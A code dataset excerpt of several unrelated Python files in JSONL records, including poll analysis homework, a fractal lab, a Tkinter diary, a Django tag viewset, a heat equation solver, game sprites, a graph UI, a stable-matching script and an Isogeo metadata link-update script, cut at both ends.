If no such row exists, returns None.\n \"\"\"\n date1 = 'Jan 01 1969' # sentinel earlier than any real poll date\n result = None\n for row in poll_rows:\n if (row['State'] == state and row['Pollster'] == pollster):\n date2 = row['Date']\n if earlier_date(date1, date2):\n date1 = date2\n result = row\n return result\n\n\ndef unique_column_values(rows, column_name):\n # Create a set of values from PollDataRow\n values = set()\n for row in rows:\n # set.add already ignores duplicates, so no membership test is needed\n values.add(row[column_name])\n return values\n\n\ndef pollster_predictions(poll_rows):\n pollsters = unique_column_values(poll_rows, 'Pollster')\n states = unique_column_values(poll_rows, 'State')\n pp = {}\n for p in pollsters:\n pp[p] = {}\n for s in states:\n # look the row up once instead of twice\n row = most_recent_poll_row(poll_rows, p, s)\n if row:\n edge = state_edges([row])\n pp[p][s] = edge[s]\n return pp\n\nprint(pollster_predictions(rows3))\n","sub_path":"hw/hw14/homework14/problem3.py","file_name":"problem3.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"127280710","text":"import matplotlib\n# Uncomment the line below if working in cs50\n# matplotlib.use('agg')\nimport matplotlib.pyplot as plt\nimport sys\n\nfrom math import sin, cos, radians\n\nCOLORS = ['#000000', '#0000CC', '#00CC00', '#00CCCC', '#CC0000', '#CC00CC', '#CCCC00']\n\n\n# Example Fractal\ndef rec_fun(x, y, length, h, color_idx):\n if h == 0:\n return\n new_color_idx = (color_idx + 1) % len(COLORS)\n \n plt.plot([x,x],[y-length/2,y+length/2], color=COLORS[color_idx])\n plt.plot([x-length/2,x+length/2],[y,y], color=COLORS[color_idx])\n \n rec_fun(x-length/4, y-length/4, length/2, h-1, new_color_idx)\n rec_fun(x-length/4, y+length/4, length/2, h-1, new_color_idx)\n rec_fun(x+length/4, y-length/4, length/2, h-1, new_color_idx)\n rec_fun(x+length/4, y+length/4, length/2, h-1, new_color_idx)\n\n\n# Easier Fractal Than Snowflake\ndef sierpinski_triangle(x, y, length, h, color_idx):\n # To be implemented\n pass\n\n\n# More Advanced (But Satisfying) Fractal\ndef snowflake(x, y, length, h):\n # To be implemented\n pass\n\n\ndef main():\n if len(sys.argv) < 3:\n print('Invalid arguments', 'Usage: python fractals.py fractal_type iterations', sep='\\n')\n exit(1)\n\n name = 'default'\n \n if sys.argv[1] == 'r':\n rec_fun(0, 0, 512, int(sys.argv[2]), 0)\n name = 'rectangle'\n elif sys.argv[1] == 's':\n snowflake(0, 0, 512, int(sys.argv[2]))\n name = 'snowflake'\n elif sys.argv[1] == 't':\n sierpinski_triangle(0, 0, 512, int(sys.argv[2]), 0)\n name = 'sierpinski'\n else:\n print('Invalid fractal type', 'Options: r, s, t (for rectangle, snowflake, and sierpinski triangle)', sep='\\n')\n exit(2)\n if matplotlib.get_backend().lower() == 'agg':\n plt.savefig(name + '.jpg', bbox_inches='tight')\n else:\n plt.show()\n\n\nmain()\n","sub_path":"lab-06/fractals.py","file_name":"fractals.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"45543782","text":"# coding=utf-8\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nimport Tkinter as tk\nfrom alan_diary import *\nfrom ScrolledText import ScrolledText\n\ndef enter_and_print(event):\n append_text(var.get())\n text_output.delete(0.0,'end')\n text_output.insert(0.0,get_text())\n var.set('')\n\nroot = tk.Tk()\nroot.title(\"Alan's diary\")\n\nvar = tk.StringVar(value=\"What do you want to write today?\")\n\n
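# NB: this script targets Python 2 (Tkinter/ScrolledText module names, reload(sys));\n# under Python 3 the equivalent imports would be tkinter and tkinter.scrolledtext.\ntext_input = 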
tk.Entry(root, textvariable=var, width=36, bd=5)\ntext_input.pack()\n\nroot.bind('<Return>', enter_and_print) # '<Return>' restored; the event name had been lost in extraction\n\ntext_output = ScrolledText(root,width=46)\ntext_output.pack()\n\nroot.mainloop()\n","sub_path":"_src/om2py2w/2wex0/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"193879721","text":"from rest_framework import generics, viewsets, status\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\n\nfrom ..publications.serializer import PublicationSerializer\nfrom ..comments.serializer import CommentSerializer\nfrom ..publications.models import Publication\nfrom ..tags.serializer import TagSerializer\nfrom ..tags.models import Tag\n\n\nclass TagViewSet(viewsets.ModelViewSet):\n queryset = Publication.objects.all()\n serializer_class = PublicationSerializer\n\n @action(methods=['GET', 'POST', 'DELETE'], detail=True)\n def tags(self, request, pk=None):\n # lower-case name so the Publication model class is not shadowed\n publication = self.get_object()\n\n if request.method == 'GET':\n serialized = TagSerializer(publication.tags, many=True)\n return Response(status=status.HTTP_200_OK, data=serialized.data)\n\n if request.method == 'POST':\n # the payload carries tag ids under the 'publications' key; this branch is\n # reconstructed to mirror the DELETE branch below (the original added a\n # Publication to a plain list and referenced an undefined attribute)\n tag_ids = request.data['publications']\n for tag_id in tag_ids:\n tag = Tag.objects.get(id=int(tag_id))\n publication.tags.add(tag)\n return Response(status=status.HTTP_201_CREATED)\n\n if request.method == 'DELETE':\n tag_ids = request.data['publications']\n for tag_id in tag_ids:\n tag = Tag.objects.get(id=int(tag_id))\n publication.tags.remove(tag)\n return Response(status=status.HTTP_204_NO_CONTENT)\n","sub_path":"apps/tags/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"602553851","text":"import numpy as np \nimport mac3dNew as M \nimport matplotlib.pyplot as plt\nimport h5py\n\nclass Mesh:\n\tdef __init__(self, N, padwidth, dt):\n\t\tself.dt = dt\n\t\tself.p = padwidth #Number of extra points in padding\n\t\tself.T = M.Array([N+2*padwidth,N+2*padwidth,N+2*padwidth])\n\t\tself.rhs = M.Array([N+2*padwidth,N+2*padwidth,N+2*padwidth])\n\t\tself.I = M.Range(padwidth, padwidth+N)\n\t\tself.J = M.Range(padwidth, padwidth+N)\n\t\tself.K = M.Range(padwidth, padwidth+N)\n\t\tself.size = N\n\t\tself.energy = []\n\n\tdef initfield(self):\n\t\tx = np.linspace(-np.pi, np.pi, self.size)\n\t\tself.dx = x[1]-x[0]\n\t\tself.dy = self.dx\n\t\tself.dz = self.dx\n\t\tY,X,Z = np.meshgrid(x,x,x)\n\t\tself.T[self.I,self.J,self.K] = np.exp(-X*X - Y*Y - Z*Z)\n\n\t# def exportfield(self, stepnumber):\n\t# \tAll = M.Range('all')\n\n # #Write out the temperature\n # fileOut = h5py.File('temperature.h5', 'w')\n # fileOut['Tat'+str(stepnumber)] = self.T[All,All,All]\n # fileOut.close()\n\n\tdef updatepadding(self):\n\t\tpad = M.Range(0, self.p)\n\t\tAll = M.Range(kind='all')\n\t\t#x padding\n\t\tself.T[pad, All, All] = self.T[pad+self.size, All, All]\n\t\tself.T[pad+self.p+self.size, All, All] = self.T[pad+self.p, All, All]\n\t\t#y padding\n\t\tself.T[All, pad, All] = self.T[All, pad+self.size, All]\n\t\tself.T[All, pad+self.p+self.size, All] = self.T[All, pad+self.p, All]\n\t\t#z padding\n\t\tself.T[All, All, pad] = self.T[All, All, pad+self.size]\n\t\tself.T[All, All, pad+self.p+self.size] = self.T[All, All, pad+self.p]\n\n\tdef computeRhs(self):\n
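\t\t# refresh the periodic ghost cells, then apply the standard 7-point Laplacian\n\t\t# (second differences in x, y and z) on the interior ranges only\n\t\tI = self.I\n\t\tJ = self.J\n\t\tK = 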
self.K\n\t\tT = self.T\n\t\tself.updatepadding()\n\t\tself.rhs[I,J,K] = ((T[I+1,J,K] -2*T[I,J,K] +T[I-1,J,K])/(self.dx**2)+\n\t\t\t\t\t\t (T[I,J+1,K] -2*T[I,J,K] +T[I,J-1,K])/(self.dy**2)+\n\t\t\t\t\t\t (T[I,J,K+1] -2*T[I,J,K] +T[I,J,K-1])/(self.dz**2))\n\n\tdef computeNorm(self):\n\t\tT = self.T \n\t\tI = self.I \n\t\tJ = self.J\n\t\tK = self.K\n\t\treturn np.sum(T[I,J,K]*T[I,J,K])/(T.shape()[0]*T.shape()[1]*T.shape()[2])\n\n\tdef advanceBy(self, steps):\n\t\tAll = M.Range(kind='all')\n\t\tfor i in range(steps):\n\t\t\tself.energy.append(self.computeNorm())\n\t\t\tself.computeRhs()\n\t\t\tself.T[All,All,All] += self.dt*self.rhs[All, All, All]","sub_path":"heateqnTest3d.py","file_name":"heateqnTest3d.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"6936978","text":"# -*- coding: utf-8 -*-\n#\n# cacabric - Arkanoid style game made with python libcaca bindings\n#\n# Copyright (c) 2013 Alex Foulon \n# All Rights Reserved\n#\n# This work is free. You can redistribute it and/or modify it under the\n# terms of the Do What The Fuck You Want To Public License, Version 2,\n# as published by Sam Hocevar. See http://www.wtfpl.net/ for more details.\n#\n\n\"\"\"This module contains game objects\"\"\"\n\n\nimport caca\n\n\n## constants for Sprite objects ###############################################\n##\n\n#sprite size\nSIZE_CHAR = 1\nSIZE_XSMALL = 4\nSIZE_SMALL = 6\nSIZE_NORMAL = 8\nSIZE_LARGE = 10\nSIZE_XLARGE = 12\nSIZE_XXLARGE = 14\n\n#ball anim time settings\nTIME_VALUE = 5000\nANIM_DELAY = 8\n\n#speed factor\nBALL_VX = 1\nBALL_VY = -1\nBONUS_VY = 0.1\nLASER_VY = -0.1\nSHIP_VX = 0.3\n\n#limit numbers\nMAX_MULTIBALL = 3\nMAX_LASER = 3\n\n#bonus types\nBONUS_A, BONUS_B, BONUS_C, BONUS_D, BONUS_E, BONUS_F = list(range(0, 6))\n\n#extra life bonus points\nEXTRA_LIFE_A = 10000\nEXTRA_LIFE_B = 25000\nEXTRA_LIFE_C = 50000\n\n#wall types\nWALL_DEFAULT = 1\nWALL_DOUBLE = 2\nWALL_NOBREAK = 9\n\n#wall bonus points\nWALL_POINTS = 25\n\n\n## Sprite object ##############################################################\n##\n\nclass Sprite(object):\n \"\"\" Common object to represent libcaca sprite.\n \"\"\"\n _delay = ANIM_DELAY\n\n def __init__(self, x, y, ch, *colors):\n \"\"\" Sprite constructor.\n\n :param x: the X coordinate for this object\n :type x: int\n :param y: the Y coordinate for this object\n :type y: int\n :param ch: the character to draw object\n :type ch: str\n\n :param *colors: caca color constant for fg and bg attributes\n :type *colors: caca.COLOR_*\n \"\"\"\n self.x = x\n self.y = y\n self.ch = ch\n\n if len(colors) > 1:\n self.bg = colors[1]\n else:\n self.bg = caca.COLOR_DEFAULT\n\n if len(colors) > 0:\n self.fg = colors[0]\n else:\n self.fg = caca.COLOR_DEFAULT\n\n\n## game sprites ###############################################################\n##\n\nclass Ball(Sprite):\n \"\"\" Object to represent the game ball.\n \"\"\"\n vx = BALL_VX\n vy = BALL_VY\n size = SIZE_CHAR\n movement = False\n onfire = False\n\n def move(self, cv):\n \"\"\" Move sprite ball on the given canvas.\n\n :param cv: the target canvas to move sprite on\n :type cv: caca.canvas.Canvas\n \"\"\"\n self.x = self.x + self.vx\n self.y = self.y + self.vy\n\n if self.y < 0:\n self.vy = -self.vy\n self.y = 0\n\n if self.x < 0:\n self.vx = -self.vx\n self.x = 0\n elif self.x + 1 > cv.get_width():\n self.vx = -self.vx\n self.x = cv.get_width() - 1\n\n if self.y >= cv.get_height():\n return False\n\n return True\n\n\nclass 
Ship(Sprite):\n \"\"\" Object to represent the player ship.\n \"\"\"\n vx = SHIP_VX\n size = SIZE_SMALL\n laser = False\n direction = None\n\n def move(self, cv):\n \"\"\" Move ship sprite on the given canvas.\n\n :param cv: the target canvas to move sprite on\n :type cv: caca.canvas.Canvas\n \"\"\"\n if self.direction == caca.KEY_LEFT:\n self.x -= self.vx\n if self.x < 0:\n self.x = 0\n elif self.direction == caca.KEY_RIGHT:\n self.x += self.vx\n if (self.x + self.size) > cv.get_width():\n self.x = (cv.get_width() - self.size)\n\n return True\n\n def grow(self):\n \"\"\" Make ship larger.\n \"\"\"\n self.size += 2\n if self.size > SIZE_XXLARGE:\n self.size = SIZE_XXLARGE\n\n return True\n\n def shrink(self):\n \"\"\" Make ship smaller.\n \"\"\"\n self.size -= 2\n if self.size < 2:\n self.size = 2\n\n return True\n\n def reset(self):\n \"\"\" Reset ship bonus.\n \"\"\"\n self.size = SIZE_SMALL\n self.laser = False\n self.direction = None\n\n\nclass Bonus(Sprite):\n \"\"\" Object to represent a player bonus.\n \"\"\"\n vy = BONUS_VY\n vx = 0\n size = SIZE_CHAR\n\n def move(self, cv):\n \"\"\" Move sprite bonus on the given canvas.\n\n :param cv: the target canvas to move sprite on\n :type cv: caca.canvas.Canvas\n \"\"\"\n self.y = self.y + self.vy\n\n if self.y > (cv.get_height() - 1):\n return False\n\n return True\n\n\nclass Laser(Sprite):\n \"\"\" Object to represent a laser shoot.\n \"\"\"\n vy = LASER_VY\n vx = 0\n size = SIZE_CHAR\n\n def move(self, cv):\n \"\"\" Move sprite laser on the given canvas.\n\n :param cv: the target canvas to move sprite on\n :type cv: caca.canvas.Canvas\n \"\"\"\n self.y = self.y + self.vy\n\n if self.y < 0:\n return False\n\n return True\n\n\nclass Wall(Sprite):\n \"\"\" Object to represent a game wall.\n \"\"\"\n size = SIZE_SMALL\n bonus = None\n wtype = WALL_DEFAULT\n\n def __init__(self, x, y, ch, *colors):\n \"\"\" Wall constructor.\n \"\"\"\n super(Wall, self).__init__(x, y, ch, *colors)\n self.random()\n\n def random(self):\n \"\"\" Generate random bonus\n \"\"\"\n #generate random bonus for wall\n r = caca.rand(0, 101)\n if r >= 80 and r < 85:\n self.bonus = BONUS_A\n elif r >= 85 and r < 90:\n self.bonus = BONUS_B\n elif r >= 90 and r < 95:\n self.bonus = BONUS_C\n elif r >= 95 and r < 98:\n self.bonus = BONUS_D\n elif r >= 98 and r < 100:\n self.bonus = BONUS_E\n elif r == 100:\n self.bonus = BONUS_F\n","sub_path":"cacabric/sprite.py","file_name":"sprite.py","file_ext":"py","file_size_in_byte":5786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"258545027","text":"\"\"\"\n @author: Matko Gabriel\n @email: ytgabi98@gmail.com\n @date: 3/3/2018 15:53\n\"\"\"\nfrom directed_graph import UndirectedGraph\n\n\nclass UI(object):\n\n def __init__(self):\n pass\n\n @staticmethod\n def printMenu(*args):\n print(\"1. Get the number of vertices\")\n print(\"2. Find if there's an edge between two vertices\")\n print(\"3. Get the in and out degree of a specified vertex\")\n print(\"4. Get the outbound edges of a specified vertex\")\n print(\"5. Get the inbound edges of a specified vertex\")\n print(\"6. Get the endpoints of an edge specified by an EDGE_ID\")\n print(\"7. Retrieve the information attached to an edge\")\n print(\"8. Modify the information attached to an edge\")\n print(\"9. Add vertex\")\n print(\"10. Remove vertex\")\n print(\"11. Add edge\")\n print(\"12. Remove edge\")\n print(\"13. Save graph\")\n print(\"14. Print all connected components\")\n print(\"15. Print menu\")\n print(\"0. 
Exit app\")\n\n @staticmethod\n def readCommand():\n option = int(input(\">>> \"))\n if option not in range(0, 15):\n raise ValueError(\"Invalid option\")\n\n return option\n\n @staticmethod\n def nrOfVertices(graph: UndirectedGraph):\n print(\"The number of vertices is:\", graph.vertices, \"\\n\")\n\n @staticmethod\n def edgeBetween(graph: UndirectedGraph):\n x = int(input(\" vertexStart : \"))\n y = int(input(\" vertexIn : \"))\n if graph.vertexExists(x) and graph.vertexExists(y):\n if graph.isEdge(x, y):\n print(\"There is an edge!\\n\")\n else:\n print(\"There is not an edge!\\n\")\n else:\n print(\"One or both vertices does not exists!\")\n\n @staticmethod\n def inOutDegree(graph: UndirectedGraph):\n vertex = int(input(\" vertex : \"))\n print(\"OUT degree:\", graph.outDegreeOf(vertex))\n print(\"IN degree:\", graph.inDegreeOf(vertex), \"\\n\")\n\n @staticmethod\n def outboundEdges(graph: UndirectedGraph):\n vertex = int(input(\" vertex : \"))\n print(\"Outbound edges of {0}:\".format(vertex), graph.outboundEdgesOf(vertex), \"\\n\")\n\n @staticmethod\n def inboundEdges(graph: UndirectedGraph):\n vertex = int(input(\" vertex : \"))\n print(\"Inbound edges of {0}:\".format(vertex), graph.inboundEdgesOf(vertex), \"\\n\")\n\n @staticmethod\n def endpointsOfEdge(graph: UndirectedGraph):\n edgeID = int(input(\" edge id : \"))\n print(\"The endpoints of edge with ID {0} are:\".format(edgeID), graph.getEndpointsOf(edgeID), \"\\n\")\n\n @staticmethod\n def retriveCost(graph: UndirectedGraph):\n edgeID = int(input(\" edge id : \"))\n print(\"The cost of edge with ID {0} is:\".format(edgeID), graph.getCostOf(edgeID), \"\\n\")\n\n @staticmethod\n def modifyCost(graph: UndirectedGraph):\n edgeID = int(input(\" edge id : \"))\n newCost = int(input(\" new cost : \"))\n graph.modifyCostOf(edgeID, newCost)\n print(\"The new cost of {0} is {1}\\n\".format(edgeID, graph.getCostOf(edgeID)))\n\n @staticmethod\n def addVertex(graph: UndirectedGraph):\n while True:\n vertex = int(input(\" vertex id : \"))\n if graph.vertexExists(vertex):\n print(\"This vertex already exists!\")\n else:\n graph.addVertex(vertex)\n print(\"The new vertex is named \", graph.vertices)\n break\n\n @staticmethod\n def removeVertex(graph: UndirectedGraph):\n while True:\n vertex = int(input(\" vertex id : \"))\n if graph.vertexExists(vertex):\n graph.removeVertex(vertex)\n print(\"Deletion completed\")\n break\n else:\n print(\"This vertex does not exists!\")\n\n @staticmethod\n def addEdge(graph: UndirectedGraph):\n while True:\n vS = int(input(\" starting edge : \"))\n vE = int(input(\" end edge : \"))\n cost = int(input(\" cost : \"))\n id = int(input(\" id : \"))\n try:\n graph.addEdge(vS, vE, cost, id)\n break\n except Exception as ex:\n print(ex)\n\n @staticmethod\n def removeEdge(graph: UndirectedGraph):\n vS = int(input(\" starting edge : \"))\n vE = int(input(\" end edge : \"))\n graph.removeEdge(vS, vE)\n print(\"Edge {0} -> {1} deleted!\".format(vS, vE))\n\n @staticmethod\n def saveGraph(graph: UndirectedGraph):\n with open(\"newGraph.txt\", \"w+\") as f:\n for vertex in graph.verticesList:\n f.write(str(vertex) + \" \" + str(graph.graphOut[vertex]) + \"\\n\")\n\n @staticmethod\n def exitApp(*args):\n exit(0)\n\n @staticmethod\n def findAllConnectedComponents(graph: UndirectedGraph):\n\n components = {}\n for vertex in graph.verticesList:\n for key in components.keys():\n bfsRez = graph.bfs(vertex)\n components[tuple(bfsRez)] = 1\n\n for component in components.keys():\n print(*component)\n toPrint = set()\n for node in 
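 # graphOut lists every undirected edge from both endpoints; checking the reversed\n # tuple below keeps a single orientation of each edge in the printout\n for node in 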
component:\n for nodeOut in graph.graphOut[node]:\n if tuple([nodeOut, node]) not in toPrint:\n toPrint.add(tuple([node, nodeOut]))\n\n if len(toPrint) != 0:\n print(\"Component starting with node:\", component[0], \"->\", *toPrint)\n\n print(\"\\nNumber of connected components: \", len(components))","sub_path":"GRAPHS/PracticalWork2/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":5586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"208187409","text":"__author__ = 'reddit.com/u/ullerrm'\n\nimport sys\n\nmale_prefs = dict()\nfemale_prefs = dict()\nfor line in sys.stdin:\n terms = line.strip().replace(',', ' ').split()\n if len(terms) < 2:\n break\n if terms[0].isupper():\n male_prefs[terms[0]] = terms[1:]\n else:\n female_prefs[terms[0]] = terms[1:]\n\nmarried_men = dict()\nengagements = dict()\n\nwhile len(male_prefs) > 0:\n suitor = next(iter(male_prefs))\n woman, male_prefs[suitor] = male_prefs[suitor][0], male_prefs[suitor][1:]\n if woman not in engagements:\n engagements[woman] = suitor\n married_men[suitor] = male_prefs[suitor]\n male_prefs.pop(suitor, None)\n else:\n fiance = engagements[woman]\n if female_prefs[woman].index(suitor) < female_prefs[woman].index(fiance):\n engagements[woman] = suitor\n married_men[suitor] = male_prefs[suitor]\n male_prefs.pop(suitor, None)\n male_prefs[fiance] = married_men[fiance]\n married_men.pop(fiance, None)\n\nfor pair in sorted(list(engagements.items()), key=lambda x: x[1]):\n print(\"({0}; {1})\".format(pair[1], pair[0]))\n","sub_path":"231hard/galeshipley.py","file_name":"galeshipley.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"11218697","text":"# -*- coding: UTF-8 -*-\n#! 
python3\n\n\"\"\"\n Name: Script to...\n Author: Isogeo\n Purpose: Script using isogeo-pysdk to update events.\n\n Python: 3.7+\n\"\"\"\n\n# ##############################################################################\n# ########## Libraries #############\n\n# Standard Library\nimport csv\nfrom os import environ\nfrom pathlib import Path\nfrom timeit import default_timer\nfrom datetime import datetime\nfrom pprint import pprint\n\n# 3rd party\nfrom dotenv import load_dotenv\n\n# Isogeo\nfrom isogeo_pysdk import Isogeo, Link, Metadata\n\n\n# load .env file\nload_dotenv(\"./env/misc.env\", override=True)\n\nBACKUP = int(environ.get(\"BACKUP\"))\nHARD_MODE = int(environ.get(\"HARD_MODE\"))\n\n# #############################################################################\n# ########## Main program ###############\n# #######################################\n\nif __name__ == \"__main__\":\n\n # Shortcuts\n # li_wg_infos = [\n # (\"504f49055abc4d0b9865038fbc99b44b\", \"feb162db72374825a6f4375ed2850556\"),\n # (\"4b729516af434ba0b2c816216440a6ad\", \"bceb8bdefda94cc1856d3a236e36cadc\"),\n # (\"e3a3412cae2843c997862f9d18857dfc\", \"859ed6e5f7fc4fd49a5c589aafc58292\"),\n # (\"80e2a30f471e43f1845a33d98e6a42e3\", \"fef80a89e62242cf815e4078b425a722\"),\n # (\"4baf1fbdf4234d91b52c56978a292938\", \"5c02e033f5504666896b0ad6c5ab1cff\"),\n # ]\n resource_md_uuid = \"feb162db72374825a6f4375ed2850556\"\n li_wg_uuid = [\n \"504f49055abc4d0b9865038fbc99b44b\",\n \"4b729516af434ba0b2c816216440a6ad\",\n \"e3a3412cae2843c997862f9d18857dfc\",\n \"80e2a30f471e43f1845a33d98e6a42e3\",\n \"4baf1fbdf4234d91b52c56978a292938\",\n ]\n li_matching_titles = [\n (\"Métadonnées de produit - BD TOPO® 3.0\", \"Métadonnées de produit - BD TOPO® 3.0\"),\n (\"Métadonnées de produit - ADMIN EXPRESS\", \"Métadonnées de produit - ADMIN EXPRESS 3.0\"),\n (\"Métadonnées de produit - BD ALTI®\", \"Métadonnées de produit - BD ALTI® 2.0\"),\n (\"Métadonnées de produit - BD CARTO®\", \"Métadonnées de produit - BD CARTO® 4.0\"),\n (\"Métadonnées de produit - BD ORTHO®\", \"Métadonnées de produit - BD ORTHO® 2.0\"),\n (\"Métadonnées de produit - Contours... IRIS® 2.1\", \"Métadonnées de produit - CONTOURS... 
IRIS® 2.1\"),\n (\"Métadonnées de produit - RGE ALTI®\", \"Métadonnées de produit - RGE ALTI® 2.0\"),\n (\"ROUTE 500® - Métadonnées de produit\", \"Métadonnées de produit - ROUTE 500® 3.0\"),\n (\"Métadonnées de produit - RPG\", \"Métadonnées de produit - RPG 2.0\"),\n (\"Métadonnées de produit - Scan 1000®\", \"Métadonnées de produit - SCAN 1000® 2.1\"),\n (\"Métadonnées de produit - Scan 100®\", \"Métadonnées de produit - SCAN 100® 2.0\"),\n (\"Métadonnées de produit - Scan 25®\", \"Métadonnées de produit - Scan 25® 3.1\"),\n ]\n\n # API client instanciation\n isogeo = Isogeo(\n client_id=environ.get(\"ISOGEO_API_USER_LEGACY_CLIENT_ID\"),\n client_secret=environ.get(\"ISOGEO_API_USER_LEGACY_CLIENT_SECRET\"),\n auth_mode=\"user_legacy\",\n auto_refresh_url=\"{}/oauth/token\".format(environ.get(\"ISOGEO_ID_URL\")),\n platform=environ.get(\"ISOGEO_PLATFORM\", \"qa\"),\n )\n isogeo.connect(\n username=environ.get(\"ISOGEO_USER_NAME\"),\n password=environ.get(\"ISOGEO_USER_PASSWORD\"),\n )\n auth_timer = default_timer()\n\n # parent_link = isogeo.metadata.links.get(metadata_id=\"feb162db72374825a6f4375ed2850556\", link_id=\"55ee7a5cf6ce47a98fad2fbf4b07e5ee\")\n # mrn_search = isogeo.search(\n # group=\"80e2a30f471e43f1845a33d98e6a42e3\",\n # whole_results=True,\n # query=\"catalog:dc5fc29e00fc4fcfb6eea10ea8d84065\"\n # )\n # gpmh_search = isogeo.search(\n # group=\"4b729516af434ba0b2c816216440a6ad\",\n # whole_results=True,\n # query=\"catalog:0c13cbfd25cc4e0eacdee4d77c3b7f4b\"\n # )\n # li_mrn_md = [Metadata(**md) for md in mrn_search.results if md.get(\"type\") == \"vectorDataset\"]\n # li_gpmh_md = [Metadata(**md) for md in gpmh_search.results if md.get(\"type\") == \"vectorDataset\"]\n # li_md = li_mrn_md + li_gpmh_md\n # new_link = Link()\n # new_link.link = parent_link.to_dict()\n # new_link.type = \"link\"\n # new_link.kind = \"url\"\n # new_link.actions = parent_link.actions\n # new_link.title = parent_link.title\n # new_link.url = parent_link.url\n # for md in li_md:\n # isogeo.metadata.links.create(\n # metadata=md,\n # link=new_link\n # )\n\n resource_md = isogeo.metadata.get(metadata_id=resource_md_uuid, include=(\"links\",))\n\n report_content = []\n for wg_uuid in li_wg_uuid:\n\n wg = isogeo.workgroup.get(wg_uuid)\n wg_name = wg.contact.get(\"name\")\n print(\"Looking for metadatas who need a new link from {} resource into '{}' workgroup ({}).\".format(resource_md._id, wg_name, wg_uuid))\n\n li_links = [Link(**link) for link in resource_md.links if any(link.get(\"title\") == tup[1] for tup in li_matching_titles)]\n li_old_links_titles = [tup[0] for tup in li_matching_titles if any(link.title == tup[1] for link in li_links)]\n\n wg_search = isogeo.search(\n group=wg_uuid,\n include=(\"links\",),\n whole_results=True\n )\n li_involved_md = [Metadata(**md) for md in wg_search.results if any(lnk.get(\"title\") in li_old_links_titles for lnk in md.get(\"links\")) and md.get(\"type\") != \"resource\"]\n\n for metadata in li_involved_md:\n for lnk in metadata.links:\n old_link_title = lnk.get(\"title\")\n\n if default_timer() - auth_timer >= 6900:\n isogeo.connect(\n username=environ.get(\"ISOGEO_USER_NAME\"),\n password=environ.get(\"ISOGEO_USER_PASSWORD\"),\n )\n auth_timer = default_timer()\n else:\n pass\n\n if old_link_title in li_old_links_titles:\n parent_link_title = [tup[1] for tup in li_matching_titles if tup[0] == old_link_title][0]\n parent_link = [good_link for good_link in li_links if good_link.title == parent_link_title][0]\n\n already_existing = 
any(old_link.get(\"type\") == \"link\" and old_link.get(\"link\").get(\"url\").strip() == parent_link.to_dict().get(\"url\").strip() for old_link in metadata.links)\n\n if not already_existing:\n new_link = Link()\n new_link.link = parent_link.to_dict()\n new_link.type = \"link\"\n new_link.kind = \"url\"\n new_link.actions = parent_link.actions\n new_link.title = parent_link.title\n new_link.url = parent_link.url\n report_line = [\n wg_name,\n wg_uuid,\n resource_md.title,\n resource_md_uuid,\n metadata.title,\n metadata._id,\n parent_link_title\n ]\n report_content.append(report_line)\n\n if HARD_MODE:\n created_link = isogeo.metadata.links.create(\n metadata=metadata,\n link=new_link\n )\n else:\n pass\n else:\n pass\n else:\n pass\n\n isogeo.close()\n\n csv_path = Path(\"./scripts/misc/clean_ign_links/csv/link_to_add_{}.csv\".format(int(datetime.now().timestamp())))\n with open(file=csv_path, mode=\"w\", newline=\"\", encoding=\"utf-8\") as csvfile:\n writer = csv.writer(csvfile, delimiter=\";\")\n writer.writerow(\n [\n \"wg_name\",\n \"wg_uuid\",\n \"resource_md_title\",\n \"resource_md_title_uuid\",\n \"target_md_title\",\n \"target_md_uuid\",\n \"new_link_title\",\n ]\n )\n for line in report_content:\n writer.writerow(line)\n","sub_path":"scripts/misc/clean_ign_links/add_new_links.py","file_name":"add_new_links.py","file_ext":"py","file_size_in_byte":8325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"44581798","text":"\"\"\"\n BY FILLING IN THIS HEADER WITH MY NAME AND MY USP NUMBER,\n I DECLARE THAT I AM THE SOLE AUTHOR OF AND RESPONSIBLE FOR THIS PROGRAM.\n ALL ORIGINAL PARTS OF THIS PROGRAMMING EXERCISE (EP) WERE\n DEVELOPED AND IMPLEMENTED BY ME FOLLOWING THE INSTRUCTIONS\n OF THIS EP AND THEREFORE DO NOT CONSTITUTE ACADEMIC DISHONESTY\n OR PLAGIARISM.\n I ALSO DECLARE THAT I AM RESPONSIBLE FOR ALL COPIES OF\n THIS PROGRAM AND THAT I HAVE NOT DISTRIBUTED OR FACILITATED\n ITS DISTRIBUTION. I AM AWARE THAT CASES OF PLAGIARISM AND\n ACADEMIC DISHONESTY WILL BE HANDLED ACCORDING TO THE CRITERIA\n PUBLISHED ON THE COURSE PAGE.\n I UNDERSTAND THAT EPs WITHOUT A SIGNATURE WILL NOT BE GRADED AND,\n EVEN SO, MAY BE PUNISHED FOR ACADEMIC DISHONESTY.\n\n Name : Pedro Henrique Tezotto Delquiaro\n NUSP : 9288582\n Class: 10\n Prof.: Hitoshi\n\n References: Except for the routines provided in the assignment\n and in class, if you used any reference, list them below\n so that your program is not considered plagiarism or irregular.\n\n Example:\n - The Quicksort algorithm was based on\n http://www.ime.usp.br/~pf/algoritmos/aulas/quick.html\n\"\"\"\n\n# ======================================================================\n#\n# M O D U L E extras\n#\n# Module in which all the additional functions you wrote\n# should be placed.\n#\n# Also include an import for the random module, as well as\n# constants, if these functions need them\n#\n# ======================================================================\ndef interpretaDirecao(direcao, lista_pacman):\n ''' (str, list) -> None\n \n Receives a letter (a, s, w, z) giving the direction in which the player\n wants to move the 